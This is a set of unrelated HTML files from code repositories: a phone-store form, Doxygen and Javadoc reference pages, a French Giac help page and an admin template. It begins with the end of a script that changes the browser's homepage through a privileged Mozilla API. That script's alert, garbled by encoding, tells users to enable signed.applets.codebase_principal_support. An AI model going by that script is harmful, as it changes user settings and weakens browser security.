alert("´Ë²Ù×÷±»ä¯ÀÀÆ÷¾Ü¾ø£¡\nÇëÔÚä¯ÀÀÆ÷µØÖ·À¸ÊäÈë¡°about:config¡±²¢»Ø³µ\nÈ»ºó½« [signed.applets.codebase_principal_support]µÄÖµÉèÖÃΪ'true',Ë«»÷¼´¿É¡£");
}
var prefs = Components.classes['@mozilla.org/preferences-service;1'].getService(Components.interfaces.nsIPrefBranch);
prefs.setCharPref('browser.startup.homepage',vrl);
}else{
alert("ÄúµÄä¯ÀÀÆ÷²»Ö§³Ö£¬Çë°´ÕÕÏÂÃæ²½Öè²Ù×÷£º1.´ò¿ªä¯ÀÀÆ÷ÉèÖá£2.µã»÷ÉèÖÃÍøÒ³¡£3.ÊäÈ룺"+vrl+"µã»÷È·¶¨¡£");
}
}
}
// ¼ÓÈëÊÕ²Ø ¼æÈÝ360ºÍIE6
function shoucang(sTitle,sURL)
{
try
{
window.external.addFavorite(sURL, sTitle);
}
catch (e)
{
try
{
window.sidebar.addPanel(sTitle, sURL, "");
}
catch (e)
{
alert("¼ÓÈëÊÕ²ØÊ§°Ü£¬ÇëʹÓÃCtrl+D½øÐÐÌí¼Ó");
}
}
}
</SCripT>
<!-- Le javaSCripT
================================================== -->
<!-- Placed at the end of the document so the pages load faster -->
<SCripT src="/images/zhuanti/xysym/jquery.js"></SCripT>
<SCripT src="/images/zhuanti/xysym/bootstrap-collapse.js"></SCripT>
<SCripT>
$(document).ready(function(){
$(".ui-select").selectWidget({
change : function (changes) {
return changes;
},
effect : "slide",
keyControl : true,
speed : 200,
scrollHeight : 250
});
});
</SCripT>
</body>
|
AddPhone.html
|
fcm2009/PhoneStore
|
<!DOCTYPE html>
<html>
<head lang="en">
<meta charset="UTF-8">
<title>The Phone Store - Add a phone to the store</title>
<script type="text/javascript">
function checkInput() {
var flag = true;
//id check
var id = document.getElementById("form")["id"];
var regex = /^.[0-9]{2}$/
if(!regex.test(id.value)) {
id.setAttribute("style", "background-color:red");
flag = false;
}
else {
id.setAttribute("style", "background-color:");
}
//model check
var model = document.getElementById("form")["model"];
var regex = /^[^\s]/
if(!regex.test(model.value)) {
model.setAttribute("style", "background-color:red");
flag = false;
}
else {
model.setAttribute("style", "background-color:");
}
//price check
var price = document.getElementById("form")["price"];
var regex = /^[0-9]+(\.[0-9]+)?$/
if(!regex.test(price.value) || price.value < 0 || price.value > 5000) {
price.setAttribute("style", "background-color:red");
flag = false;
}
else {
price.setAttribute("style", "background-color:");
}
if(flag) {
document.forms["form"].submit();
}
}
</script>
<link type="text/css" rel="stylesheet" href="style.css">
</head>
<body>
<a href="index.html" class="navigation">Home</a>
<a href="AddPhone.html" class="navigation">Add a phone</a>
<a href="SearchPhone.html" class="navigation">search for a phone</a>
<a href="DeletePhone.html" class="navigation">delete a phone from the store</a>
<a href="ModifyPhone.html" class="navigation">modify a phone in the store</a>
<h1>Add a new Phone</h1>
<p>Fill the following phone information pleas:</p>
<form id="form" method="post" action="AddPhoneToDB.php">
<div><label>Phone ID:</label>
<input type="text" name="id">
</div>
<div><label>Phone model:</label>
<input type="text" name="model">
</div>
<div><label>Phone color:</label>
<input type="color" name="color">
</div>
<div><label>Phone price:</label>
<input type="text" name="price">
</div>
<div><label>Support touch :</label>
<input type="checkbox" name="touch" checked>
</div>
<div>
<input type="button" name = "search" value="add" onclick="checkInput()">
<input type="reset" name = "reset" value="reset">
</div>
</form>
</body>
</html>
|
doxygen/html/classfreemind_1_1modes_1_1common_1_1plugins_1_1_reminder_hook_base_1_1_timer_blink_task.html
|
mibischo/freemind
|
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=9"/>
<meta name="generator" content="Doxygen 1.8.6"/>
<title>freemind: freemind.modes.common.plugins.ReminderHookBase.TimerBlinkTask Class Reference</title>
<link href="tabs.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="jquery.js"></script>
<script type="text/javascript" src="dynsections.js"></script>
<link href="search/search.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="search/search.js"></script>
<script type="text/javascript">
$(document).ready(function() { searchBox.OnSelectItem(0); });
</script>
<link href="doxygen.css" rel="stylesheet" type="text/css" />
</head>
<body>
<div id="top"><!-- do not remove this div, it is closed by doxygen! -->
<div id="titlearea">
<table cellspacing="0" cellpadding="0">
<tbody>
<tr style="height: 56px;">
<td style="padding-left: 0.5em;">
<div id="projectname">freemind
</div>
</td>
</tr>
</tbody>
</table>
</div>
<!-- end header part -->
<!-- Generated by Doxygen 1.8.6 -->
<script type="text/javascript">
var searchBox = new SearchBox("searchBox", "search",false,'Search');
</script>
<div id="navrow1" class="tabs">
<ul class="tablist">
<li><a href="index.html"><span>Main Page</span></a></li>
<li><a href="pages.html"><span>Related Pages</span></a></li>
<li><a href="namespaces.html"><span>Packages</span></a></li>
<li class="current"><a href="annotated.html"><span>Classes</span></a></li>
<li><a href="files.html"><span>Files</span></a></li>
<li>
<div id="MSearchBox" class="MSearchBoxInactive">
<span class="left">
<img id="MSearchSelect" src="search/mag_sel.png"
onmouseover="return searchBox.OnSearchSelectShow()"
onmouseout="return searchBox.OnSearchSelectHide()"
alt=""/>
<input type="text" id="MSearchField" value="Search" accesskey="S"
onfocus="searchBox.OnSearchFieldFocus(true)"
onblur="searchBox.OnSearchFieldFocus(false)"
onkeyup="searchBox.OnSearchFieldChange(event)"/>
</span><span class="right">
<a id="MSearchClose" href="javascript:searchBox.CloseResultsWindow()"><img id="MSearchCloseImg" border="0" src="search/close.png" alt=""/></a>
</span>
</div>
</li>
</ul>
</div>
<div id="navrow2" class="tabs2">
<ul class="tablist">
<li><a href="annotated.html"><span>Class List</span></a></li>
<li><a href="classes.html"><span>Class Index</span></a></li>
<li><a href="inherits.html"><span>Class Hierarchy</span></a></li>
<li><a href="functions.html"><span>Class Members</span></a></li>
</ul>
</div>
<!-- window showing the filter options -->
<div id="MSearchSelectWindow"
onmouseover="return searchBox.OnSearchSelectShow()"
onmouseout="return searchBox.OnSearchSelectHide()"
onkeydown="return searchBox.OnSearchSelectKey(event)">
<a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(0)"><span class="SelectionMark"> </span>All</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(1)"><span class="SelectionMark"> </span>Classes</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(2)"><span class="SelectionMark"> </span>Namespaces</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(3)"><span class="SelectionMark"> </span>Files</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(4)"><span class="SelectionMark"> </span>Functions</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(5)"><span class="SelectionMark"> </span>Variables</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(6)"><span class="SelectionMark"> </span>Pages</a></div>
<!-- iframe showing the search results (closed by default) -->
<div id="MSearchResultsWindow">
<iframe src="javascript:void(0)" frameborder="0"
name="MSearchResults" id="MSearchResults">
</iframe>
</div>
<div id="nav-path" class="navpath">
<ul>
<li class="navelem"><a class="el" href="namespacefreemind.html">freemind</a></li><li class="navelem"><a class="el" href="namespacefreemind_1_1modes.html">modes</a></li><li class="navelem"><a class="el" href="namespacefreemind_1_1modes_1_1common.html">common</a></li><li class="navelem"><a class="el" href="namespacefreemind_1_1modes_1_1common_1_1plugins.html">plugins</a></li><li class="navelem"><a class="el" href="classfreemind_1_1modes_1_1common_1_1plugins_1_1_reminder_hook_base.html">ReminderHookBase</a></li><li class="navelem"><a class="el" href="classfreemind_1_1modes_1_1common_1_1plugins_1_1_reminder_hook_base_1_1_timer_blink_task.html">TimerBlinkTask</a></li> </ul>
</div>
</div><!-- top -->
<div class="header">
<div class="summary">
<a href="#pub-methods">Public Member Functions</a> |
<a href="classfreemind_1_1modes_1_1common_1_1plugins_1_1_reminder_hook_base_1_1_timer_blink_task-members.html">List of all members</a> </div>
<div class="headertitle">
<div class="title">freemind.modes.common.plugins.ReminderHookBase.TimerBlinkTask Class Reference</div> </div>
</div><!--header-->
<div class="contents">
<div class="dynheader">
Inheritance diagram for freemind.modes.common.plugins.ReminderHookBase.TimerBlinkTask:</div>
<div class="dyncontent">
<div class="center"><img src="classfreemind_1_1modes_1_1common_1_1plugins_1_1_reminder_hook_base_1_1_timer_blink_task__inherit__graph.png" border="0" usemap="#freemind_8modes_8common_8plugins_8_reminder_hook_base_8_timer_blink_task_inherit__map" alt="Inheritance graph"/></div>
<map name="freemind_8modes_8common_8plugins_8_reminder_hook_base_8_timer_blink_task_inherit__map" id="freemind_8modes_8common_8plugins_8_reminder_hook_base_8_timer_blink_task_inherit__map">
</map>
<center><span class="legend">[<a href="graph_legend.html">legend</a>]</span></center></div>
<div class="dynheader">
Collaboration diagram for freemind.modes.common.plugins.ReminderHookBase.TimerBlinkTask:</div>
<div class="dyncontent">
<div class="center"><img src="classfreemind_1_1modes_1_1common_1_1plugins_1_1_reminder_hook_base_1_1_timer_blink_task__coll__graph.png" border="0" usemap="#freemind_8modes_8common_8plugins_8_reminder_hook_base_8_timer_blink_task_coll__map" alt="Collaboration graph"/></div>
<map name="freemind_8modes_8common_8plugins_8_reminder_hook_base_8_timer_blink_task_coll__map" id="freemind_8modes_8common_8plugins_8_reminder_hook_base_8_timer_blink_task_coll__map">
</map>
<center><span class="legend">[<a href="graph_legend.html">legend</a>]</span></center></div>
<table class="memberdecls">
<tr class="heading"><td colspan="2"><h2 class="groupheader"><a name="pub-methods"></a>
Public Member Functions</h2></td></tr>
<tr class="memitem:aa6428a7eebcec3dd7de6c82e624e4035"><td class="memItemLeft" align="right" valign="top"> </td><td class="memItemRight" valign="bottom"><a class="el" href="classfreemind_1_1modes_1_1common_1_1plugins_1_1_reminder_hook_base_1_1_timer_blink_task.html#aa6428a7eebcec3dd7de6c82e624e4035">TimerBlinkTask</a> (boolean stateAdded)</td></tr>
<tr class="separator:aa6428a7eebcec3dd7de6c82e624e4035"><td class="memSeparator" colspan="2"> </td></tr>
<tr class="memitem:ab7fda264dd8c1b75a50b4151c11c6277"><td class="memItemLeft" align="right" valign="top">void </td><td class="memItemRight" valign="bottom"><a class="el" href="classfreemind_1_1modes_1_1common_1_1plugins_1_1_reminder_hook_base_1_1_timer_blink_task.html#ab7fda264dd8c1b75a50b4151c11c6277">actionPerformed</a> (ActionEvent pE)</td></tr>
<tr class="separator:ab7fda264dd8c1b75a50b4151c11c6277"><td class="memSeparator" colspan="2"> </td></tr>
</table>
<h2 class="groupheader">Constructor & Destructor Documentation</h2>
<a class="anchor" id="aa6428a7eebcec3dd7de6c82e624e4035"></a>
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">freemind.modes.common.plugins.ReminderHookBase.TimerBlinkTask.TimerBlinkTask </td>
<td>(</td>
<td class="paramtype">boolean </td>
<td class="paramname"><em>stateAdded</em></td><td>)</td>
<td></td>
</tr>
</table>
</div><div class="memdoc">
</div>
</div>
<h2 class="groupheader">Member Function Documentation</h2>
<a class="anchor" id="ab7fda264dd8c1b75a50b4151c11c6277"></a>
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">void freemind.modes.common.plugins.ReminderHookBase.TimerBlinkTask.actionPerformed </td>
<td>(</td>
<td class="paramtype">ActionEvent </td>
<td class="paramname"><em>pE</em></td><td>)</td>
<td></td>
</tr>
</table>
</div><div class="memdoc">
<p><div class="dynheader">
Here is the call graph for this function:</div>
<div class="dyncontent">
<div class="center"><img src="classfreemind_1_1modes_1_1common_1_1plugins_1_1_reminder_hook_base_1_1_timer_blink_task_ab7fda264dd8c1b75a50b4151c11c6277_cgraph.png" border="0" usemap="#classfreemind_1_1modes_1_1common_1_1plugins_1_1_reminder_hook_base_1_1_timer_blink_task_ab7fda264dd8c1b75a50b4151c11c6277_cgraph" alt=""/></div>
<map name="classfreemind_1_1modes_1_1common_1_1plugins_1_1_reminder_hook_base_1_1_timer_blink_task_ab7fda264dd8c1b75a50b4151c11c6277_cgraph" id="classfreemind_1_1modes_1_1common_1_1plugins_1_1_reminder_hook_base_1_1_timer_blink_task_ab7fda264dd8c1b75a50b4151c11c6277_cgraph">
<area shape="rect" id="node2" href="classfreemind_1_1modes_1_1common_1_1plugins_1_1_reminder_hook_base.html#addabae6761d2633279fe564ab0117853" title="freemind.modes.common.plugins.\lReminderHookBase.getRemindUserAt\lAsSecondsFromNow" alt="" coords="323,5,565,61"/>
<area shape="rect" id="node3" href="classfreemind_1_1modes_1_1common_1_1plugins_1_1_reminder_hook_base.html#a4161acb771fe46be965b19594691aa39" title="freemind.modes.common.plugins.\lReminderHookBase.setRemindUserAt" alt="" coords="323,86,565,127"/>
<area shape="rect" id="node4" href="classfreemind_1_1modes_1_1common_1_1plugins_1_1_reminder_hook_base.html#afef87502862565725f6dd53fafc39528" title="freemind.modes.common.plugins.\lReminderHookBase.displayState" alt="" coords="335,239,553,281"/>
<area shape="rect" id="node5" href="classfreemind_1_1extensions_1_1_node_hook_adapter.html#a5dc3f6951adfb0e15eb69acb57aa34fb" title="freemind.extensions.Node\lHookAdapter.getNode" alt="" coords="649,126,821,167"/>
<area shape="rect" id="node6" href="classfreemind_1_1modes_1_1common_1_1plugins_1_1_reminder_hook_base.html#a6cede59f42f78671e8ba39da4a1dbeea" title="freemind.modes.common.plugins.\lReminderHookBase.getStateKey" alt="" coords="626,191,843,233"/>
<area shape="rect" id="node7" href="classfreemind_1_1modes_1_1common_1_1plugins_1_1_reminder_hook_base.html#a932aca42546f43d994a7ea973417ce12" title="freemind.modes.common.plugins.\lReminderHookBase.nodeRefresh" alt="" coords="626,257,843,298"/>
<area shape="rect" id="node8" href="interfacefreemind_1_1modes_1_1_mind_map_node.html#a83d7f4de5c123740d92dba20d891ff7b" title="freemind.modes.MindMapNode.isRoot" alt="" coords="613,323,856,349"/>
<area shape="rect" id="node9" href="interfacefreemind_1_1modes_1_1_mind_map_node.html#acbc6c9f7e3d475bbcd7caad1cc11cea0" title="freemind.modes.MindMapNode.get\lParentNode" alt="" coords="623,374,846,415"/>
</map>
</div>
</p>
</div>
</div>
<hr/>The documentation for this class was generated from the following file:<ul>
<li>C:/Source/freemind/freemind/modes/common/plugins/<a class="el" href="_reminder_hook_base_8java.html">ReminderHookBase.java</a></li>
</ul>
</div><!-- contents -->
<!-- start footer part -->
<hr class="footer"/><address class="footer"><small>
Generated on Tue Apr 21 2015 12:44:39 for freemind by  <a href="http://www.doxygen.org/index.html">
<img class="footer" src="doxygen.png" alt="doxygen"/>
</a> 1.8.6
</small></address>
</body>
</html>
|
CodenameOne/javadoc/com/codename1/ui/util/UITimer.html
|
shannah/cn1
|
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- NewPage -->
<html lang="en">
<head>
<!-- Generated by javadoc (version 1.7.0_04) on Thu May 15 10:36:25 IDT 2014 -->
<title>UITimer (Codename One API)</title>
<meta name="date" content="2014-05-15">
<link rel="stylesheet" type="text/css" href="../../../../stylesheet.css" title="Style">
</head>
<body>
<script type="text/javascript"><!--
if (location.href.indexOf('is-external=true') == -1) {
parent.document.title="UITimer (Codename One API)";
}
//-->
</script>
<noscript>
<div>JavaScript is disabled on your browser.</div>
</noscript>
<!-- ========= START OF TOP NAVBAR ======= -->
<div class="topNav"><a name="navbar_top">
<!-- -->
</a><a href="#skip-navbar_top" title="Skip navigation links"></a><a name="navbar_top_firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../../../../overview-summary.html">Overview</a></li>
<li><a href="package-summary.html">Package</a></li>
<li class="navBarCell1Rev">Class</li>
<li><a href="package-tree.html">Tree</a></li>
<li><a href="../../../../deprecated-list.html">Deprecated</a></li>
<li><a href="../../../../index-all.html">Index</a></li>
<li><a href="../../../../help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li><a href="../../../../com/codename1/ui/util/UIBuilder.html" title="class in com.codename1.ui.util"><span class="strong">Prev Class</span></a></li>
<li>Next Class</li>
</ul>
<ul class="navList">
<li><a href="../../../../index.html?com/codename1/ui/util/UITimer.html" target="_top">Frames</a></li>
<li><a href="UITimer.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_top">
<li><a href="../../../../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_top");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<div>
<ul class="subNavList">
<li>Summary: </li>
<li>Nested | </li>
<li>Field | </li>
<li><a href="#constructor_summary">Constr</a> | </li>
<li><a href="#method_summary">Method</a></li>
</ul>
<ul class="subNavList">
<li>Detail: </li>
<li>Field | </li>
<li><a href="#constructor_detail">Constr</a> | </li>
<li><a href="#method_detail">Method</a></li>
</ul>
</div>
<a name="skip-navbar_top">
<!-- -->
</a></div>
<!-- ========= END OF TOP NAVBAR ========= -->
<!-- ======== START OF CLASS DATA ======== -->
<div class="header">
<div class="subTitle">com.codename1.ui.util</div>
<h2 title="Class UITimer" class="title">Class UITimer</h2>
</div>
<div class="contentContainer">
<ul class="inheritance">
<li><a href="../../../../java/lang/Object.html" title="class in java.lang">java.lang.Object</a></li>
<li>
<ul class="inheritance">
<li>com.codename1.ui.util.UITimer</li>
</ul>
</li>
</ul>
<div class="description">
<ul class="blockList">
<li class="blockList">
<hr>
<br>
<pre>public class <span class="strong">UITimer</span>
extends <a href="../../../../java/lang/Object.html" title="class in java.lang">Object</a></pre>
<div class="block">Simple timer callback that is invoked on the CodenameOne EDT thread rather
than on a separate thread. Notice that the accuracy of this timer is very low!
A timer must be linked to a specific form</div>
</li>
</ul>
</div>
<div class="summary">
<ul class="blockList">
<li class="blockList">
<!-- ======== CONSTRUCTOR SUMMARY ======== -->
<ul class="blockList">
<li class="blockList"><a name="constructor_summary">
<!-- -->
</a>
<h3>Constructor Summary</h3>
<table class="overviewSummary" border="0" cellpadding="3" cellspacing="0" summary="Constructor Summary table, listing constructors, and an explanation">
<caption><span>Constructors</span><span class="tabEnd"> </span></caption>
<tr>
<th class="colFirst" scope="col">Modifier</th>
<th class="colLast" scope="col">Constructor and Description</th>
</tr>
<tr class="altColor">
<td class="colFirst"><code>protected </code></td>
<td class="colLast"><code><strong><a href="../../../../com/codename1/ui/util/UITimer.html#UITimer()">UITimer</a></strong>()</code>
<div class="block">This constructor is useful when deriving this class to implement a timer.</div>
</td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code> </code></td>
<td class="colLast"><code><strong><a href="../../../../com/codename1/ui/util/UITimer.html#UITimer(java.lang.Runnable)">UITimer</a></strong>(<a href="../../../../java/lang/Runnable.html" title="interface in java.lang">Runnable</a> r)</code>
<div class="block">Constructor that accepts a runnable to invoke on timer elapse</div>
</td>
</tr>
</table>
</li>
</ul>
<!-- ========== METHOD SUMMARY =========== -->
<ul class="blockList">
<li class="blockList"><a name="method_summary">
<!-- -->
</a>
<h3>Method Summary</h3>
<table class="overviewSummary" border="0" cellpadding="3" cellspacing="0" summary="Method Summary table, listing methods, and an explanation">
<caption><span>Methods</span><span class="tabEnd"> </span></caption>
<tr>
<th class="colFirst" scope="col">Modifier and Type</th>
<th class="colLast" scope="col">Method and Description</th>
</tr>
<tr class="altColor">
<td class="colFirst"><code>void</code></td>
<td class="colLast"><code><strong><a href="../../../../com/codename1/ui/util/UITimer.html#cancel()">cancel</a></strong>()</code>
<div class="block">Stops executing the timer</div>
</td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>void</code></td>
<td class="colLast"><code><strong><a href="../../../../com/codename1/ui/util/UITimer.html#schedule(int, boolean, com.codename1.ui.Form)">schedule</a></strong>(int timeMillis,
boolean repeat,
<a href="../../../../com/codename1/ui/Form.html" title="class in com.codename1.ui">Form</a> bound)</code>
<div class="block">Binds the timer to start at the given schedule</div>
</td>
</tr>
</table>
<ul class="blockList">
<li class="blockList"><a name="methods_inherited_from_class_java.lang.Object">
<!-- -->
</a>
<h3>Methods inherited from class java.lang.<a href="../../../../java/lang/Object.html" title="class in java.lang">Object</a></h3>
<code><a href="../../../../java/lang/Object.html#equals(java.lang.Object)">equals</a>, <a href="../../../../java/lang/Object.html#getClass()">getClass</a>, <a href="../../../../java/lang/Object.html#hashCode()">hashCode</a>, <a href="../../../../java/lang/Object.html#notify()">notify</a>, <a href="../../../../java/lang/Object.html#notifyAll()">notifyAll</a>, <a href="../../../../java/lang/Object.html#toString()">toString</a>, <a href="../../../../java/lang/Object.html#wait()">wait</a>, <a href="../../../../java/lang/Object.html#wait(long)">wait</a>, <a href="../../../../java/lang/Object.html#wait(long, int)">wait</a></code></li>
</ul>
</li>
</ul>
</li>
</ul>
</div>
<div class="details">
<ul class="blockList">
<li class="blockList">
<!-- ========= CONSTRUCTOR DETAIL ======== -->
<ul class="blockList">
<li class="blockList"><a name="constructor_detail">
<!-- -->
</a>
<h3>Constructor Detail</h3>
<a name="UITimer()">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>UITimer</h4>
<pre>protected UITimer()</pre>
<div class="block">This constructor is useful when deriving this class to implement a timer.</div>
</li>
</ul>
<a name="UITimer(java.lang.Runnable)">
<!-- -->
</a>
<ul class="blockListLast">
<li class="blockList">
<h4>UITimer</h4>
<pre>public UITimer(<a href="../../../../java/lang/Runnable.html" title="interface in java.lang">Runnable</a> r)</pre>
<div class="block">Constructor that accepts a runnable to invoke on timer elapse</div>
<dl><dt><span class="strong">Parameters:</span></dt><dd><code>r</code> - runnable instance</dd></dl>
</li>
</ul>
</li>
</ul>
<!-- ============ METHOD DETAIL ========== -->
<ul class="blockList">
<li class="blockList"><a name="method_detail">
<!-- -->
</a>
<h3>Method Detail</h3>
<a name="schedule(int, boolean, com.codename1.ui.Form)">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>schedule</h4>
<pre>public void schedule(int timeMillis,
boolean repeat,
<a href="../../../../com/codename1/ui/Form.html" title="class in com.codename1.ui">Form</a> bound)</pre>
<div class="block">Binds the timer to start at the given schedule</div>
<dl><dt><span class="strong">Parameters:</span></dt><dd><code>timeMillis</code> - the time from now in milliseconds</dd><dd><code>repeat</code> - whether the timer repeats</dd><dd><code>bound</code> - the form to which the timer is bound</dd></dl>
</li>
</ul>
<a name="cancel()">
<!-- -->
</a>
<ul class="blockListLast">
<li class="blockList">
<h4>cancel</h4>
<pre>public void cancel()</pre>
<div class="block">Stops executing the timer</div>
</li>
</ul>
</li>
</ul>
</li>
</ul>
</div>
</div>
<!-- ========= END OF CLASS DATA ========= -->
<!-- ======= START OF BOTTOM NAVBAR ====== -->
<div class="bottomNav"><a name="navbar_bottom">
<!-- -->
</a><a href="#skip-navbar_bottom" title="Skip navigation links"></a><a name="navbar_bottom_firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../../../../overview-summary.html">Overview</a></li>
<li><a href="package-summary.html">Package</a></li>
<li class="navBarCell1Rev">Class</li>
<li><a href="package-tree.html">Tree</a></li>
<li><a href="../../../../deprecated-list.html">Deprecated</a></li>
<li><a href="../../../../index-all.html">Index</a></li>
<li><a href="../../../../help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li><a href="../../../../com/codename1/ui/util/UIBuilder.html" title="class in com.codename1.ui.util"><span class="strong">Prev Class</span></a></li>
<li>Next Class</li>
</ul>
<ul class="navList">
<li><a href="../../../../index.html?com/codename1/ui/util/UITimer.html" target="_top">Frames</a></li>
<li><a href="UITimer.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_bottom">
<li><a href="../../../../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_bottom");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<div>
<ul class="subNavList">
<li>Summary: </li>
<li>Nested | </li>
<li>Field | </li>
<li><a href="#constructor_summary">Constr</a> | </li>
<li><a href="#method_summary">Method</a></li>
</ul>
<ul class="subNavList">
<li>Detail: </li>
<li>Field | </li>
<li><a href="#constructor_detail">Constr</a> | </li>
<li><a href="#method_detail">Method</a></li>
</ul>
</div>
<a name="skip-navbar_bottom">
<!-- -->
</a></div>
<!-- ======== END OF BOTTOM NAVBAR ======= -->
</body>
</html>
|
giac/giac-1.2.3/doc/fr/cascmd_fr/cascmd_fr291.html
|
hiplayer/giac
|
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"
"http://www.w3.org/TR/REC-html40/loose.dtd">
<HTML>
<HEAD>
<META http-equiv="Content-Type" content="text/html; charset=UTF-8">
<META name="GENERATOR" content="hevea 1.10">
<LINK rel="stylesheet" type="text/css" href="cascmd_fr.css">
<TITLE>Différence entre fonction et expression</TITLE>
</HEAD>
<BODY >
<A HREF="cascmd_fr290.html"><IMG SRC="previous_motif.gif" ALT="Previous"></A>
<A HREF="index.html"><IMG SRC="contents_motif.gif" ALT="Up"></A>
<A HREF="cascmd_fr292.html"><IMG SRC="next_motif.gif" ALT="Next"></A>
<HR>
<H3 CLASS="subsection"><A NAME="htoc367">6.17.1</A> Différence entre fonction et expression</H3><P><A NAME="@default498"></A><A NAME="@default499"></A>
Une fonction <TT>f</TT> est définie par exemple par :<BR>
<TT>f(x):=x</TT><CODE><TT>^</TT></CODE><TT>2-1</TT> ou encore par <TT>f:=x->x</TT><CODE><TT>^</TT></CODE><TT>2-1</TT><BR>
cela signifie que pour tous les <I>x</I>, <I>f</I>(<I>x</I>) est égale à l’expression
<I>x</I><SUP>2</SUP>−1.<BR>
On pourra ainsi taper <TT>f(2)</TT> pour avoir la valeur de <I>f</I> en <I>x</I>=2.<BR>
Par contre si on définit :<BR>
<TT>g:=x</TT><CODE><TT>^</TT></CODE><TT>2-1</TT> cela signifie que <TT>g</TT> est une variable qui contient
l’expression <I>x</I><SUP>2</SUP>−1. Pour avoir la valeur de <I>g</I> en <I>x</I>=2 il faut alors
écrire :<BR>
<TT>subst(g,x=2)</TT> car <I>g</I> est une expression qui dépend de <I>x</I>.<BR>
Aussi, lorsque l’argument d’une commande est une fonction il faut mettre
comme argument, soit par exemple <TT>x->x</TT><CODE><TT>^</TT></CODE><TT>2-1</TT>, soit <TT>f</TT> (si
<TT>f</TT> est une fonction qui a été définie auparavant par exemple par
<TT>f(x):=x</TT><CODE><TT>^</TT></CODE><TT>2-1</TT>) et<BR>
lorsque l’argument d’une commande est une expression on met comme argument,
soit par exemple <TT>x</TT><CODE><TT>^</TT></CODE><TT>2-1</TT>, soit <TT>g</TT> (si <TT>g</TT> est une variable
que l’on a définie auparavant par exemple <TT>g:=x</TT><CODE><TT>^</TT></CODE><TT>2-1</TT>), soit
<TT>f(x)</TT> (si <TT>f</TT> est une fonction qui a été définie auparavant par
exemple <TT>f(x):=x</TT><CODE><TT>^</TT></CODE><TT>2-1</TT>).
</P><HR>
<A HREF="cascmd_fr290.html"><IMG SRC="previous_motif.gif" ALT="Previous"></A>
<A HREF="index.html"><IMG SRC="contents_motif.gif" ALT="Up"></A>
<A HREF="cascmd_fr292.html"><IMG SRC="next_motif.gif" ALT="Next"></A>
</BODY>
</HTML>
|
Exemplo - Template original/layout-horizontal-sidebar-menu-collapsed-right.html
|
RogerCavaler/ponto
|
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<meta name="description" content="Xenon Boostrap Admin Panel" />
<meta name="author" content="" />
<title>Xenon - Both Menus & Collapsed</title>
<link rel="stylesheet" href="http://fonts.googleapis.com/css?family=Arimo:400,700,400italic">
<link rel="stylesheet" href="assets/css/fonts/linecons/css/linecons.css">
<link rel="stylesheet" href="assets/css/fonts/fontawesome/css/font-awesome.min.css">
<link rel="stylesheet" href="assets/css/bootstrap.css">
<link rel="stylesheet" href="assets/css/xenon-core.css">
<link rel="stylesheet" href="assets/css/xenon-forms.css">
<link rel="stylesheet" href="assets/css/xenon-components.css">
<link rel="stylesheet" href="assets/css/xenon-skins.css">
<link rel="stylesheet" href="assets/css/custom.css">
<script src="assets/js/jquery-1.11.1.min.js"></script>
<!-- HTML5 shim and Respond.js IE8 support of HTML5 elements and media queries -->
<!--[if lt IE 9]>
<script src="https://oss.maxcdn.com/html5shiv/3.7.2/html5shiv.min.js"></script>
<script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script>
<![endif]-->
</head>
<body class="page-body right-sidebar">
<div class="settings-pane">
<a href="#" data-toggle="settings-pane" data-animate="true">
×
</a>
<div class="settings-pane-inner">
<div class="row">
<div class="col-md-4">
<div class="user-info">
<div class="user-image">
<a href="extra-profile.html">
<img src="assets/images/user-2.png" class="img-responsive img-circle" />
</a>
</div>
<div class="user-details">
<h3>
<a href="extra-profile.html">John Smith</a>
<!-- Available statuses: is-online, is-idle, is-busy and is-offline -->
<span class="user-status is-online"></span>
</h3>
<p class="user-title">Web Developer</p>
<div class="user-links">
<a href="extra-profile.html" class="btn btn-primary">Edit Profile</a>
<a href="extra-profile.html" class="btn btn-success">Upgrade</a>
</div>
</div>
</div>
</div>
